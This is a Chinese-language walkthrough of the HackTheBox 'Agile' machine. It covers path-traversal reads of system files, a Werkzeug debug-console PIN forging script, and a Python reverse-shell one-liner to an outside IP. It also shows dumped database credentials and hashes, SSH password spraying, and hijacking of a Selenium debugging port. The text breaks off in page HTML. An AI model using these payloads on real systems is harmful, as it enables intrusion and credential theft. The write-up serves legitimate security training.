Aglie-htb-writeup

0x00 靶场技能介绍

章节技能：本地文件包含、Werkzeug控制台利用、数据库密码、密码重用、端口转发、内部测试网站漏洞、CVE-2023-22809、sudo

参考链接：https://otrashoui.xyz/agile/#edwards-to-root

参考链接：https://0xdf.gitlab.io/2023/08/05/htb-agile.html#shell-as-edwards

0x01 用户权限获取

1、靶机介绍

关于 Agile
Agile 是一款中等难度的 Linux 机器，在端口 80 上有一个密码管理网站。创建帐户并添加几个密码后，该网站的导出到 CSV 功能被发现容易受到任意文件读取攻击。对其他端点的枚举表明，/download 在访问时会抛出错误，并调出 Werkzeug 调试控制台。此控制台通过 PIN 保护，但是，此控制台与通过前面提到的漏洞读取文件的能力相结合，允许用户对此 PIN 进行逆向工程并以 www-data 的形式执行系统命令。然后可以识别数据库凭据，以便连接到密码管理器网站的 SQL 数据库，该数据库保存系统上 corum 用户的凭据。发现该网站的第二个版本正在运行，并且自动化系统通过 Selenium Web 驱动程序对其进行测试。Selenium 的调试端口是开放的，通过 SSH 隧道，攻击者可以访问网站的测试环境并获取用户 edwards 的凭据。最后，CVE-2023-22809、全局bashrc文件中的自定义条目以及 Python 虚拟环境激活脚本上的不正确权限的组合导致了权限提升。

2、测试下靶机的连通率

┌──(kali㉿offsec)-[~/Desktop]
└─$ ping 10.10.11.203 -c 4     
PING 10.10.11.203 (10.10.11.203) 56(84) bytes of data.
64 bytes from 10.10.11.203: icmp_seq=1 ttl=63 time=188 ms
64 bytes from 10.10.11.203: icmp_seq=2 ttl=63 time=132 ms
64 bytes from 10.10.11.203: icmp_seq=3 ttl=63 time=167 ms

--- 10.10.11.203 ping statistics ---
4 packets transmitted, 3 received, 25% packet loss, time 2997ms
rtt min/avg/max/mdev = 131.721/162.177/187.679/23.111 ms

3、扫描下开放端口情况

──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -Pn 10.10.11.203 --min-rate=10000                   
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:29 CST
Warning: 10.10.11.203 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.203
Host is up (0.13s latency).
Not shown: 64905 closed tcp ports (reset), 628 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 33.88 seconds
                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80 -Pn 10.10.11.203 --min-rate=10000 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-27 11:35 CST
Nmap scan report for 10.10.11.203
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f4:bc:ee:21:d7:1f:1a:a2:65:72:21:2d:5b:a6:f7:00 (ECDSA)
|_  256 65:c1:48:0d:88:cb:b9:75:a0:2c:a5:e6:37:7e:51:06 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://superpass.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.62 seconds

4、确实端口少的靶机，越难搞，这是经验之谈，先绑定下hosts吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.203 superpass.htb" | sudo tee -a /etc/hosts
10.10.11.203 superpass.htb

5、查看下首页信息

http://superpass.htb

http://superpass.htb/account/login

http://superpass.htb/account/register

6、这里，我注册一个账号

shiyan

MM123456

7、这里注册的时候，会出现概率性的报告，也就是出现werkzeug控制台

/app/venv/lib/python3.10/site-packages/sqlalchemy/engine/base.py

8、登录到网站后，是一个密码保存的功能界面

http://superpass.htb/vault

9、这里尝试密码导出的时候，发现了漏洞点

GET /download?fn=shiyan_export_372dc96379.csv HTTP/1.1
Host: superpass.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: remember_token=9|a275b2aea46e42270522571f45b406fb088ac53b8e03bcba8b41bc6365aca4109f0e62f2ca673de535c3986fa0187e878ba0753683e6790585356dc6c228f8fe; session=.eJwljjEOwzAIAP_iuYPBBpx8JgIMatekmar-vamynXQ66T5lyz2OZ1nf-xmPsr1mWYtYRYg6QCYbdkFaTAOd8iKA4cwSMDOFBaFaTW4kE7UFDQJO525_YWjSeutXOLJXTeiEBotWHUokJO4tsIl6engCSGrHco2cR-z3zVK-P1QNLpM.ZvYmrQ.6u8AztLpBDFVA4ZT5NDEqE2g06w
Upgrade-Insecure-Requests: 1

10、这里疑似是一个本地包含的漏洞点

http://superpass.htb/download?fn=../../../../../../../../../../etc/hosts

11、那就再读取下本地的用户吧

http://superpass.htb/download?fn=../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
corum:x:1000:1000:corum:/home/corum:/bin/bash
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mysql:x:109:112:MySQL Server,,,:/nonexistent:/bin/false
runner:x:1001:1001::/app/app-testing/:/bin/sh
edwards:x:1002:1002::/home/edwards:/bin/bash
dev_admin:x:1003:1003::/home/dev_admin:/bin/bash
_laurel:x:999:999::/var/log/laurel:/bin/false

12、可以发现有两个普通用户，但是都没有权限，无法读取SSH秘钥

13、到这里就是需要结合这个本地包含漏洞和那个werkzeug控制台来获取初始shell了，下面是漏洞参考文章

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug

14、一些前提条件

要利用控制台 PIN，需要两组变量，probably_public_bits 和 private_bits：

probably_public_bits
username: 指发起 Flask 会话的用户。

modname: 通常指定为 flask.app。

getattr(app, '__name__', getattr(app.__class__, '__name__')): 通常解析为 Flask。

getattr(mod, '__file__', None): 表示 Flask 目录中 app.py 的完整路径（例如，/usr/local/lib/python3.5/dist-packages/flask/app.py）。如果 app.py 不适用，尝试 app.pyc。


private_bits
uuid.getnode(): 获取当前机器的 MAC 地址，str(uuid.getnode()) 将其转换为十进制格式。

要 确定服务器的 MAC 地址，必须识别应用使用的活动网络接口（例如，ens3）。如果不确定，泄露 /proc/net/arp 以找到设备 ID，然后 从 /sys/class/net/<device id>/address 提取 MAC 地址。

可以按如下方式将十六进制 MAC 地址转换为十进制：

# 示例 MAC 地址: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692

get_machine_id(): 将 /etc/machine-id 或 /proc/sys/kernel/random/boot_id 中的数据与 /proc/self/cgroup 的第一行在最后一个斜杠（/）之后的部分连接起来。


get_machine_id(): 将 /etc/machine-id 或 /proc/sys/kernel/random/boot_id 中的数据与 /proc/self/cgroup 的第一行在最后一个斜杠（/）之后的部分连接起来。

15、接下来就是整个的利用过程

http://superpass.htb/download?fn=../../../../../../../../../../proc/net/arp

http://superpass.htb/download?fn=../../../../../sys/class/net/eth0/address

http://superpass.htb/download?fn=../../../../../../../../../../etc/machine-id

http://superpass.htb/download?fn=../../../../../proc/self/cgroup

http://superpass.htb/download?fn=../../../../../proc/sys/kernel/random/boot_id

16、十六进制 MAC 地址到十进制的转换可以按如下方式进行

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3               
Python 3.11.9 (main, Apr 10 2024, 13:16:36) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> print(0x005056b93312)
345052361490
>>> exit()

17、贴出利用代码：

import hashlib
from itertools import chain
probably_public_bits = [
    'www-data',  # username
    'flask.app',  # modname
    'wsgi_app',  # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/app/venv/lib/python3.10/site-packages/flask/app.py'  # getattr(mod, '__file__', None),
]

private_bits = [
    '345052361490',  # str(uuid.getnode()),  /sys/class/net/ens33/address
    'ed5b159560f54721827644bc9b220d00superpass.service'  # get_machine_id(), /etc/machine-id
]

# h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

18、运行脚本

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 pin.py
629-963-121

19、输入上述的PIN后，即可进入控制台

[console ready]
>>> os.popen('id').read()
'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
>>> 

20、我们成功输入了PIN码，并进入了调试界面，也成功的执行了命令，下面就是获取shell权限吧

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")

21、然后获取到了反弹shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.11.203] 40378
(venv) www-data@agile:/app/app$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(venv) www-data@agile:/app/app$ 

22、接下来，我通过查看配置文件，和数据库登录操作，发现了几个密码

(venv) www-data@agile:/app/app$ ls -la
ls -la
total 28
drwxr-xr-x 5 corum runner 4096 Feb  8  2023 .
drwxr-xr-x 6 root  root   4096 Mar  8  2023 ..
drwxrwxr-x 3 corum runner 4096 Feb  8  2023 .pytest_cache
drwxr-xr-x 2 corum runner 4096 Feb  8  2023 __pycache__
-rw-rw-r-- 1 corum runner   95 Jan 23  2023 requirements.txt
drwxrwxr-x 9 corum runner 4096 Mar  7  2023 superpass
-rw-r--r-- 1 corum runner  105 Jan 24  2023 wsgi.py
(venv) www-data@agile:/app/app$ cd ../
cd ../
(venv) www-data@agile:/app$ ls -la
ls -la
total 36
drwxr-xr-x  6 root      root      4096 Mar  8  2023 .
drwxr-xr-x 20 root      root      4096 Feb 20  2023 ..
drwxr-xr-x  3 root      root      4096 Jan 23  2023 .pytest_cache
drwxr-xr-x  5 corum     runner    4096 Feb  8  2023 app
drwxr-xr-x  9 runner    runner    4096 Feb  8  2023 app-testing
-r--r-----  1 dev_admin www-data    88 Jan 25  2023 config_prod.json
-r--r-----  1 dev_admin runner      99 Jan 25  2023 config_test.json
-rwxr-xr-x  1 root      runner     557 Sep 29 08:39 test_and_update.sh
drwxrwxr-x  5 root      dev_admin 4096 Feb  8  2023 venv
(venv) www-data@agile:/app$ cat config_prod.json
cat config_prod.json
{"SQL_URI": "mysql+pymysql://superpassuser:dSA6l7q*yIVs$39Ml6ywvgK@localhost/superpass"}(venv) www-data@agile:/app$ 

(venv) www-data@agile:/app$ cat config_test.json
cat config_test.json
cat: config_test.json: Permission denied
(venv) www-data@agile:/app$ 


(venv) www-data@agile:/app$ ls -la /home/
ls -la /home/
total 20
drwxr-xr-x  5 root      root      4096 Feb  8  2023 .
drwxr-xr-x 20 root      root      4096 Feb 20  2023 ..
drwxr-x---  8 corum     corum     4096 Feb  8  2023 corum
drwxr-x---  2 dev_admin dev_admin 4096 Feb  8  2023 dev_admin
drwxr-x---  5 edwards   edwards   4096 Feb  8  2023 edwards
(venv) www-data@agile:/app$ 



(venv) www-data@agile:/app$ mysql -u superpassuser -p'dSA6l7q*yIVs$39Ml6ywvgK'
< mysql -u superpassuser -p'dSA6l7q*yIVs$39Ml6ywvgK'
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 32
Server version: 8.0.32-0ubuntu0.22.04.2 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 
mysql> SSELECT table_schema, table_name FROM information_schema.tables
SELECT table_schema, table_name FROM information_schema.tables
    -> ;
;
+--------------------+---------------------------------------+
| TABLE_SCHEMA       | TABLE_NAME                            |
+--------------------+---------------------------------------+
| information_schema | CHARACTER_SETS                        |
| information_schema | CHECK_CONSTRAINTS                     |
| information_schema | COLLATIONS                            |
| information_schema | COLLATION_CHARACTER_SET_APPLICABILITY |
| information_schema | COLUMNS                               |
| information_schema | COLUMNS_EXTENSIONS                    |
| information_schema | COLUMN_STATISTICS                     |
| information_schema | EVENTS                                |
| information_schema | FILES                                 |
| information_schema | INNODB_DATAFILES                      |
| information_schema | INNODB_FOREIGN                        |
| information_schema | INNODB_FOREIGN_COLS                   |
| information_schema | INNODB_FIELDS                         |
| information_schema | INNODB_TABLESPACES_BRIEF              |
| information_schema | KEY_COLUMN_USAGE                      |
| information_schema | KEYWORDS                              |
| information_schema | PARAMETERS                            |
| information_schema | PARTITIONS                            |
| information_schema | REFERENTIAL_CONSTRAINTS               |
| information_schema | RESOURCE_GROUPS                       |
| information_schema | ROUTINES                              |
| information_schema | SCHEMATA                              |
| information_schema | SCHEMATA_EXTENSIONS                   |
| information_schema | ST_SPATIAL_REFERENCE_SYSTEMS          |
| information_schema | ST_UNITS_OF_MEASURE                   |
| information_schema | ST_GEOMETRY_COLUMNS                   |
| information_schema | STATISTICS                            |
| information_schema | TABLE_CONSTRAINTS                     |
| information_schema | TABLE_CONSTRAINTS_EXTENSIONS          |
| information_schema | TABLES                                |
| information_schema | TABLES_EXTENSIONS                     |
| information_schema | TABLESPACES_EXTENSIONS                |
| information_schema | TRIGGERS                              |
| information_schema | VIEW_ROUTINE_USAGE                    |
| information_schema | VIEW_TABLE_USAGE                      |
| information_schema | VIEWS                                 |
| information_schema | COLUMN_PRIVILEGES                     |
| information_schema | ENGINES                               |
| information_schema | OPTIMIZER_TRACE                       |
| information_schema | PLUGINS                               |
| information_schema | PROCESSLIST                           |
| information_schema | PROFILING                             |
| information_schema | SCHEMA_PRIVILEGES                     |
| information_schema | TABLESPACES                           |
| information_schema | TABLE_PRIVILEGES                      |
| information_schema | USER_PRIVILEGES                       |
| information_schema | ENABLED_ROLES                         |
| information_schema | APPLICABLE_ROLES                      |
| information_schema | ADMINISTRABLE_ROLE_AUTHORIZATIONS     |
| information_schema | ROLE_COLUMN_GRANTS                    |
| information_schema | ROLE_ROUTINE_GRANTS                   |
| information_schema | ROLE_TABLE_GRANTS                     |
| information_schema | USER_ATTRIBUTES                       |
| information_schema | INNODB_SESSION_TEMP_TABLESPACES       |
| information_schema | INNODB_VIRTUAL                        |
| information_schema | INNODB_BUFFER_POOL_STATS              |
| information_schema | INNODB_BUFFER_PAGE                    |
| information_schema | INNODB_CMPMEM_RESET                   |
| information_schema | INNODB_CMPMEM                         |
| information_schema | INNODB_TRX                            |
| information_schema | INNODB_CMP_PER_INDEX_RESET            |
| information_schema | INNODB_CMP_RESET                      |
| information_schema | INNODB_FT_DEFAULT_STOPWORD            |
| information_schema | INNODB_METRICS                        |
| information_schema | INNODB_TEMP_TABLE_INFO                |
| information_schema | INNODB_FT_DELETED                     |
| information_schema | INNODB_TABLESTATS                     |
| information_schema | INNODB_CMP                            |
| information_schema | INNODB_TABLES                         |
| information_schema | INNODB_FT_BEING_DELETED               |
| information_schema | INNODB_BUFFER_PAGE_LRU                |
| information_schema | INNODB_CMP_PER_INDEX                  |
| information_schema | INNODB_FT_CONFIG                      |
| information_schema | INNODB_CACHED_INDEXES                 |
| information_schema | INNODB_FT_INDEX_TABLE                 |
| information_schema | INNODB_COLUMNS                        |
| information_schema | INNODB_FT_INDEX_CACHE                 |
| information_schema | INNODB_INDEXES                        |
| information_schema | INNODB_TABLESPACES                    |
| performance_schema | processlist                           |
| performance_schema | session_account_connect_attrs         |
| performance_schema | global_status                         |
| performance_schema | session_status                        |
| performance_schema | global_variables                      |
| performance_schema | session_variables                     |
| performance_schema | variables_info                        |
| performance_schema | persisted_variables                   |
| superpass          | users                                 |
| superpass          | passwords                             |
+--------------------+---------------------------------------+
89 rows in set (0.01 sec)

mysql> select * from users;
select * from users;
ERROR 1046 (3D000): No database selected
mysql> sselect * from superpass.users;
select * from superpass.users;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
| id | username | hashed_password                                                                                                          |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
|  1 | 0xdf     | $6$rounds=200000$FRtvqJFfrU7DSyT7$8eGzz8Yk7vTVKudEiFBCL1T7O4bXl0.yJlzN0jp.q0choSIBfMqvxVIjdjzStZUYg6mSRB2Vep0qELyyr0fqF. |
|  2 | corum    | $6$rounds=200000$yRvGjY1MIzQelmMX$9273p66QtJQb9afrbAzugxVFaBhb9lyhp62cirpxJEOfmIlCy/LILzFxsyWj/mZwubzWylr3iaQ13e4zmfFfB1 |
|  9 | shiyan   | $6$rounds=200000$mUn/fLPlYLd/CAj5$RWO8cNhKGl4kVPXmlrTlPfzc.9abgX5yiTlaSl49VR9nT1fLz6DPENq6tKtApoJuMAY3.GWotfsmjBbEoQSiL0 |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)

mysql> select * from superpass.passwords;
select * from superpass.passwords;
+----+---------------------+---------------------+----------------+----------+----------------------+---------+
| id | created_date        | last_updated_data   | url            | username | password             | user_id |
+----+---------------------+---------------------+----------------+----------+----------------------+---------+
|  3 | 2022-12-02 21:21:32 | 2022-12-02 21:21:32 | hackthebox.com | 0xdf     | 762b430d32eea2f12970 |       1 |
|  4 | 2022-12-02 21:22:55 | 2022-12-02 21:22:55 | mgoblog.com    | 0xdf     | 5b133f7a6a1c180646cb |       1 |
|  6 | 2022-12-02 21:24:44 | 2022-12-02 21:24:44 | mgoblog        | corum    | 47ed1e73c955de230a1d |       2 |
|  7 | 2022-12-02 21:25:15 | 2022-12-02 21:25:15 | ticketmaster   | corum    | 9799588839ed0f98c211 |       2 |
|  8 | 2022-12-02 21:25:27 | 2022-12-02 21:25:27 | agile          | corum    | 5db7caa1d13cc37c9fc2 |       2 |
+----+---------------------+---------------------+----------------+----------+----------------------+---------+
5 rows in set (0.00 sec)

mysql> 

23、然后想着去破解下，结果发现都不对

24、然后还了个思路去尝试看看，这些是不是就是密码

┌──(kali㉿offsec)-[~/Desktop]
└─$ netexec ssh 10.10.11.203 -u corum -p passwd.txt                           
SSH         10.10.11.203    22     10.10.11.203     [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
SSH         10.10.11.203    22     10.10.11.203     [-] corum:762b430d32eea2f12970
SSH         10.10.11.203    22     10.10.11.203     [-] corum:5b133f7a6a1c180646cb
SSH         10.10.11.203    22     10.10.11.203     [-] corum:47ed1e73c955de230a1d
SSH         10.10.11.203    22     10.10.11.203     [-] corum:9799588839ed0f98c211
SSH         10.10.11.203    22     10.10.11.203     [+] corum:5db7caa1d13cc37c9fc2  Linux - Shell access!

25、结果还真是，那就直接登录吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh corum@10.10.11.203            
The authenticity of host '10.10.11.203 (10.10.11.203)' can't be established.
ED25519 key fingerprint is SHA256:kxY+4fRgoCr8yE48B5Lb02EqxyyUN9uk6i/ZIH4H1pc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.203' (ED25519) to the list of known hosts.
corum@10.10.11.203's password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-60-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Last login: Wed Mar  8 15:25:35 2023 from 10.10.14.47
corum@agile:~$ id
uid=1000(corum) gid=1000(corum) groups=1000(corum)
corum@agile:~$

26、获取下第一个flag信息

corum@agile:~$ ls -la
total 48
drwxr-x--- 8 corum corum 4096 Feb  8  2023 .
drwxr-xr-x 5 root  root  4096 Feb  8  2023 ..
lrwxrwxrwx 1 root  root     9 Feb  6  2023 .bash_history -> /dev/null
-rw-r--r-- 1 corum corum  220 Jan  6  2022 .bash_logout
-rw-r--r-- 1 corum corum 3771 Jan  6  2022 .bashrc
drwx------ 4 corum corum 4096 Feb  8  2023 .cache
drwxr-xr-x 4 corum corum 4096 Feb  8  2023 .config
drwx------ 3 corum corum 4096 Feb  8  2023 .local
drwx------ 3 corum corum 4096 Feb  8  2023 .pki
-rw-r--r-- 1 corum corum  807 Jan  6  2022 .profile
drwxrwxr-x 3 corum corum 4096 Feb  8  2023 .pytest_cache
drwx------ 2 corum corum 4096 Feb  8  2023 .ssh
-rw-r----- 1 root  corum   33 Sep 29 08:13 user.txt
corum@agile:~$ cat user.txt 
e1e4d14a28c36aedb1c5edb8447f8520
corum@agile:~$ 

0x02 系统权限获取

27、继续枚举，发现了测试网站的运行

corum@agile:~$ cd /app/
corum@agile:/app$ ls -la
total 36
drwxr-xr-x  6 root      root      4096 Mar  8  2023 .
drwxr-xr-x 20 root      root      4096 Feb 20  2023 ..
drwxr-xr-x  3 root      root      4096 Jan 23  2023 .pytest_cache
drwxr-xr-x  5 corum     runner    4096 Feb  8  2023 app
drwxr-xr-x  9 runner    runner    4096 Feb  8  2023 app-testing
-r--r-----  1 dev_admin www-data    88 Jan 25  2023 config_prod.json
-r--r-----  1 dev_admin runner      99 Jan 25  2023 config_test.json
-rwxr-xr-x  1 root      runner     557 Sep 29 09:21 test_and_update.sh
drwxrwxr-x  5 root      dev_admin 4096 Feb  8  2023 venv
corum@agile:/app$ cat test_and_update.sh 
#!/bin/bash

# update prod with latest from testing constantly assuming tests are passing

echo "Starting test_and_update"
date

# if already running, exit
ps auxww | grep -v "grep" | grep -q "pytest" && exit

echo "Not already running. Starting..."

# start in dev folder
cd /app/app-testing

# system-wide source doesn't seem to happen in cron jobs
source /app/venv/bin/activate

# run tests, exit if failure
pytest -x 2>&1 >/dev/null || exit

# tests good, update prod (flask debug mode will load it instantly)
cp -r superpass /app/app/
echo "Complete!"
corum@agile:/app$

corum@agile:/app$ cd app-testing/
corum@agile:/app/app-testing$ ls -la
total 48
drwxr-xr-x 9 runner runner 4096 Feb  8  2023 .
drwxr-xr-x 6 root   root   4096 Mar  8  2023 ..
drwxr-xr-x 3 runner runner 4096 Feb  8  2023 .cache
drwxrwxr-x 3 runner runner 4096 Jan 25  2023 .local
drwx------ 3 runner runner 4096 Jan 25  2023 .pki
drwxr-xr-x 3 runner runner 4096 Dec 13  2022 .pytest_cache
-rw-r--r-- 1 runner runner  128 Jan 23  2023 README.md
drwxr-xr-x 2 runner runner 4096 Jan 25  2023 __pycache__
-rw-r--r-- 1 runner runner   95 Jan 23  2023 requirements.txt
drwxr-xr-x 9 runner runner 4096 Mar  7  2023 superpass
drwxr-xr-x 3 runner runner 4096 Feb  6  2023 tests
-rw-r--r-- 1 runner runner   73 Jan 23  2023 wsgi-dev.py
corum@agile:/app/app-testing$ cat wsgi-dev.py 
from superpass.app import app, dev

if __name__ == "__main__":
    dev()
corum@agile:/app/app-testing$

corum@agile:/app/app-testing/tests/functional$ ls -la
total 20
drwxr-xr-x 3 runner    runner 4096 Feb  7  2023 .
drwxr-xr-x 3 runner    runner 4096 Feb  6  2023 ..
drwxrwxr-x 2 runner    runner 4096 Sep 29 09:30 __pycache__
-rw-r----- 1 dev_admin runner   34 Sep 29 09:30 creds.txt
-rw-r--r-- 1 runner    runner 2663 Sep 29 09:30 test_site_interactively.py
corum@agile:/app/app-testing/tests/functional$ 

28、是没有权限读取这个文件的，通过查看 test_site_interactively.py 这个文件，发现上面那个Creds.txt 确实是存储着账号密码登信息。

29、看到这个，突然想开，我们前面hosts里发现的那个一模一样的 test子域名的网站，其实是测试网站，还存在数据。。。

30、绑定下这个域名

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.203 test.superpass.htb" | sudo tee -a /etc/hosts
10.10.11.203 test.superpass.htb

31、访问下

http://test.superpass.htb/

32、就是会自动跳转到主域名下， 继续看看规则是啥规则吧

@pytest.fixture(scope="session")
def driver():
    options = Options()
    #options.add_argument("--no-sandbox")
    options.add_argument("--window-size=1420,1080")
    options.add_argument("--headless")
    options.add_argument("--remote-debugging-port=41829")
    options.add_argument('--disable-gpu')
    options.add_argument('--crash-dumps-dir=/tmp')
    driver = webdriver.Chrome(options=options)
    yield driver
    driver.close()

33、看来是的代理过来看看才行

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh -L 5000:localhost:5000 corum@10.10.11.203
corum@10.10.11.203's password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-60-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Last login: Wed Mar  8 15:25:35 2023 from 10.10.14.47
corum@agile:~$ 

34、然后访问

http://127.0.0.1:5000/

35、这里就是属于是测试网址了，但是到这里，我突然在其他的演练报告里，发现了更加便捷的方法

https://otrashoui.xyz/agile/#corum-to-edwards

from selenium import webdriver
from selenium.webdriver.chrome.options import Options

options = Options()
options.add_argument("--headless")
options.add_argument('--disable-gpu')
options.add_argument('--crash-dumps-dir=/tmp')
options.add_experimental_option("debuggerAddress", "127.0.0.1:41829")
driver = webdriver.Chrome(options=options)

driver.get("http://test.superpass.htb/vault")
print(driver.page_source)


corum@agile:~$ ls
user.txt
corum@agile:~$ touch test.py
corum@agile:~$ vim test.py


corum@agile:~$ python3 test.py 
<html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🦸</text></svg>">
    <title>SuperPassword 🦸</title>
        <link rel="stylesheet" href="/static/css/josefinsans.css">
    <link rel="stylesheet" href="/static/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
    <link href="/static/css/site.css" rel="stylesheet">
    <link href="/static/css/all.min.css" rel="stylesheet">
    
<style>                      .htmx-indicator{opacity:0;transition: opacity 200ms ease-in;}                      .htmx-request .htmx-indicator{opacity:1}                      .htmx-request.htmx-indicator{opacity:1}                    </style></head>
<body class="d-flex flex-column min-vh-100">
    <nav class="navbar navbar-expand-sm fixed-top">
    <div class="container">
        <span class="navbar-brand d-flex w-50 me-auto">🦸SuperPassword</span>
        <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"><span class="navbar-toggler-icon"></span></button>
